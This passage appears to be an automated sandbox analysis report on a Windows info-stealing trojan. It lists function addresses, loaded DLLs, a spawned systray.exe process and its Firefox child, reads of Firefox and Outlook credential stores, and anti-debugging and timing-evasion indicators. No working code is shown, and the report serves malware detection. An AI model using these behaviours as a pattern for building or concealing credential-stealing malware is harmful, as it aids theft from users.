              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521B2C04_2_0521B2C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B7D734_2_052B7D73
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05203D404_2_05203D40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B1D5A4_2_052B1D5A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521FDC04_2_0521FDC0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05279C324_2_05279C32
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFCF24_2_052BFCF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFF094_2_052BFF09
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFFB14_2_052BFFB1
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05201F924_2_05201F92
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05209EB04_2_05209EB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052959104_2_05295910
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052099504_2_05209950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521B9504_2_0521B950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0526D8004_2_0526D800
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052038E04_2_052038E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFB764_2_052BFB76
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0521FB804_2_0521FB80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05275BF04_2_05275BF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0523DBF94_2_0523DBF9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05273A6C4_2_05273A6C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052BFA494_2_052BFA49
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052B7A464_2_052B7A46
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_05245AA04_2_05245AA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0529DAAC4_2_0529DAAC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052A1AA34_2_052A1AA3
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_052ADAC64_2_052ADAC6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032121604_2_03212160
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320CFCF4_2_0320CFCF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320CFD04_2_0320CFD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B32A4_2_0320B32A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B3304_2_0320B330
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B1E04_2_0320B1E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320D1F04_2_0320D1F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0320B1DF4_2_0320B1DF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_03213A004_2_03213A00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032139FB4_2_032139FB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_032158004_2_03215800
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0322BEE04_2_0322BEE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE4534_2_04FAE453
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE7ED4_2_04FAE7ED
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAE3344_2_04FAE334
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04FAD8B84_2_04FAD8B8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 0114F290 appears 105 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 010BB970 appears 280 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 01117E54 appears 111 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 0113EA12 appears 86 times
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: String function: 01105130 appears 58 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0526EA12 appears 86 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0527F290 appears 105 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 051EB970 appears 280 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05247E54 appears 102 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05235130 appears 58 times
              Source: JJ0tnjLiDS.exe Static PE information: No import functions for PE file found
              Source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.00000000011BD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2379955192.000000000100C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs JJ0tnjLiDS.exe
              Source: JJ0tnjLiDS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: JJ0tnjLiDS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: JJ0tnjLiDS.exe Static PE information: Section .text
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@16/9
              Source: C:\Windows\SysWOW64\systray.exe File created: C:\Users\user\AppData\Local\Temp\at8-FI0k
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: systray.exe, 00000004.00000002.4495421876.000000000350F000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4495421876.00000000034FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: JJ0tnjLiDS.exe Virustotal: Detection: 61%
              Source: JJ0tnjLiDS.exe ReversingLabs: Detection: 64%
              Source: unknown Process created: C:\Users\user\Desktop\JJ0tnjLiDS.exe "C:\Users\user\Desktop\JJ0tnjLiDS.exe"
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
              Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\systray.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: JJ0tnjLiDS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: systray.pdb source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: JJ0tnjLiDS.exe, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: x6fGRpae78G.exe, 00000003.00000002.4495152615.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp, x6fGRpae78G.exe, 00000006.00000002.4495151605.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp
              Source: JJ0tnjLiDS.exe Static PE information: section name: .text entropy: 7.996319502854974
              Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E rdtsc 0_2_0110096E
              Source: C:\Windows\SysWOW64\systray.exe Window / User API: threadDelayed 2454
              Source: C:\Windows\SysWOW64\systray.exe Window / User API: threadDelayed 7518
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596 Thread sleep count: 2454 > 30
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596 Thread sleep time: -4908000s >= -30000s
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596 Thread sleep count: 7518 > 30
              Source: C:\Windows\SysWOW64\systray.exe TID: 5596 Thread sleep time: -15036000s >= -30000s
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564 Thread sleep time: -80000s >= -30000s
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564 Thread sleep count: 37 > 30
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564 Thread sleep time: -55500s >= -30000s
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564 Thread sleep time: -37000s >= -30000s
              Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0321CA20 FindFirstFileW,FindNextFileW,FindClose,4_2_0321CA20
              Source: at8-FI0k.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E rdtsc 0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE7B63 LdrLoadDll,0_2_00CE7B63
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01180115 mov eax, dword ptr fs:[00000030h]0_2_01180115
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156500 mov eax, dword ptr fs:[00000030h]0_2_01156500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194500 mov eax, dword ptr fs:[00000030h]0_2_01194500
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE53E mov eax, dword ptr fs:[00000030h]0_2_010EE53E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0535 mov eax, dword ptr fs:[00000030h]0_2_010D0535
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8550 mov eax, dword ptr fs:[00000030h]0_2_010C8550
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8550 mov eax, dword ptr fs:[00000030h]0_2_010C8550
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F656A mov eax, dword ptr fs:[00000030h]0_2_010F656A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F4588 mov eax, dword ptr fs:[00000030h]0_2_010F4588
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2582 mov eax, dword ptr fs:[00000030h]0_2_010C2582
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2582 mov ecx, dword ptr fs:[00000030h]0_2_010C2582
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE59C mov eax, dword ptr fs:[00000030h]0_2_010FE59C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011405A7 mov eax, dword ptr fs:[00000030h]0_2_011405A7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E45B1 mov eax, dword ptr fs:[00000030h]0_2_010E45B1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E45B1 mov eax, dword ptr fs:[00000030h]0_2_010E45B1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE5CF mov eax, dword ptr fs:[00000030h]0_2_010FE5CF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE5CF mov eax, dword ptr fs:[00000030h]0_2_010FE5CF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C65D0 mov eax, dword ptr fs:[00000030h]0_2_010C65D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA5D0 mov eax, dword ptr fs:[00000030h]0_2_010FA5D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA5D0 mov eax, dword ptr fs:[00000030h]0_2_010FA5D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC5ED mov eax, dword ptr fs:[00000030h]0_2_010FC5ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC5ED mov eax, dword ptr fs:[00000030h]0_2_010FC5ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EE5E7 mov eax, dword ptr fs:[00000030h]0_2_010EE5E7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C25E0 mov eax, dword ptr fs:[00000030h]0_2_010C25E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8402 mov eax, dword ptr fs:[00000030h]0_2_010F8402
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE420 mov eax, dword ptr fs:[00000030h]0_2_010BE420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC427 mov eax, dword ptr fs:[00000030h]0_2_010BC427
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146420 mov eax, dword ptr fs:[00000030h]0_2_01146420
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA430 mov eax, dword ptr fs:[00000030h]0_2_010FA430
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A456 mov eax, dword ptr fs:[00000030h]0_2_0117A456
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FE443 mov eax, dword ptr fs:[00000030h]0_2_010FE443
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E245A mov eax, dword ptr fs:[00000030h]0_2_010E245A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B645D mov eax, dword ptr fs:[00000030h]0_2_010B645D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C460 mov ecx, dword ptr fs:[00000030h]0_2_0114C460
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EA470 mov eax, dword ptr fs:[00000030h]0_2_010EA470
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A49A mov eax, dword ptr fs:[00000030h]0_2_0117A49A
